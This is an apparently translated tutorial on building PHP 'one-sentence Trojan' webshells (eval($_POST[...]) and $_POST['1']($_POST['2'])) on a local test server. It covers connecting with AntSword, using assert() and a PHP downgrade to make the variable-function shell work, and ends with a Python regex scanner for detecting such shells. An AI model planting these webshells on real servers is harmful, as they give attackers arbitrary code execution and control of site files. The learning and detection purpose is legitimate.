Reproducing the one-sentence Trojan
2022-07-24 01:17:00 【Orange oak】
Start the Apache service and write a one-sentence Trojan
Start the Apache service through the small software tool, create a PHP file in the root directory,
and write the following code in the created file:
<?php
eval($_POST['2']);
?>
Then test it with AntSword (中国蚁剑).
First, right-click to add a new entry, enter the URL of the file just written in the URL address field, and set the connection password to 2. Also change the encoder to base64.
Then click Test Connection; a message in the lower right corner shows that the connection succeeded.
A successful connection means the file path is compromised: the content of the website is visible, its directory structure can be browsed, and any file that is opened can also be edited.
Now let's revise the PHP code, rewriting it as:
<?php
$_POST['1']($_POST['2']);
?>
Then modify the URL of the entry just added in AntSword, /127.0.0.1/muma_demo.php.
Here "eval" is submitted through "1", which is equivalent to substituting eval for the $_POST['1'] we wrote. But this connection fails.
Connecting works when eval is used directly, so why can't it be substituted like this?
This comes down to the rules of eval: eval is a language construct, not a function, so it cannot be called as a variable function.
Use assert instead; assert can also execute arbitrary commands.
This does not succeed either, so capture the request with Burp Suite to check.
The capture shows that the value of 2 is submitted directly as a string of PHP functions for reading files, but the parameter of assert() cannot be such a string. Only expressions and functions can be executed.
Change the encoding method:
Capture the request again. The encoding is now base64, which satisfies the condition that the parameter of assert() must be a function.
You can also try to connect with 1=assert;2=eval($_POST['3']).
This satisfies the requirement that the parameter of assert() be a function or an expression, and the eval statement has a parameter that can be passed in, so the connection succeeds.
At the beginning, I kept getting errors when accessing it. Even with 1=assert&2 the displayed result was empty, and it would also show
The solution was to change my PHP version. At first I used version 7.3.4 for the experiment; after switching to version 5.3.29 it worked. This is because in PHP 7.2 and above, assert() is also a language construct, not a function, so it becomes the same as the eval statement and cannot be invoked through a variable function.
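For defenders, both shell forms shown above leave a recognizable signature in PHP source. The scanner below is an added example, not part of the original post; the rule names, function names and the one-step variable tracking are assumptions of this example, and a match is a lead for manual review rather than proof of a webshell.

```python
import re
from pathlib import Path

GAP = r"(?:\s|/\*[\s\S]*?\*/)*"   # whitespace or /* */ allowed between tokens
REQ = r"\$_(?:POST|GET|REQUEST|COOKIE)" + GAP + r"\[[^\]]*\]"   # client input

RULES = [
    # eval($_POST['2']); assert() is included because the post shows it
    # working as a callable function on PHP 5.3.29.
    ("request-data-evaluated",
     re.compile(r"\b(?i:eval|assert)" + GAP + r"\(" + GAP + "@?" + GAP + REQ)),
    # $_POST['1']($_POST['2']); the client names the function to call.
    ("request-chosen-callee", re.compile(REQ + GAP + r"\(")),
]
# $f = $_POST['1']; so that a later $f(...) can be flagged as well.
ASSIGN = re.compile(r"(\$\w+)" + GAP + "=" + GAP + "@?" + GAP + REQ)


def _line(src, pos):
    return src.count("\n", 0, pos) + 1


def scan_source(src):
    """Return sorted (line, rule) findings for one PHP source string."""
    hits = {(_line(src, m.start()), name)
            for name, rx in RULES for m in rx.finditer(src)}
    for var in {m.group(1) for m in ASSIGN.finditer(src)}:
        call = re.compile(re.escape(var) + r"\b" + GAP + r"\(")
        hits |= {(_line(src, m.start()), "request-chosen-callee")
                 for m in call.finditer(src)}
    return sorted(hits)


def scan_tree(root):
    """Scan every *.php file under root and return {path: findings}."""
    report = {}
    for path in Path(root).rglob("*.php"):
        found = scan_source(path.read_text(errors="replace"))
        if found:
            report[str(path)] = found
    return report


if __name__ == "__main__":
    # Constructed sample: the second shell from the post.
    print(scan_source("<?php\n$_POST['1']($_POST['2']);\n?>"))
```

Run `scan_tree()` over the web root on a schedule or after deployments and compare the findings with the previous run, since a newly appearing match in a writable directory is the interesting event.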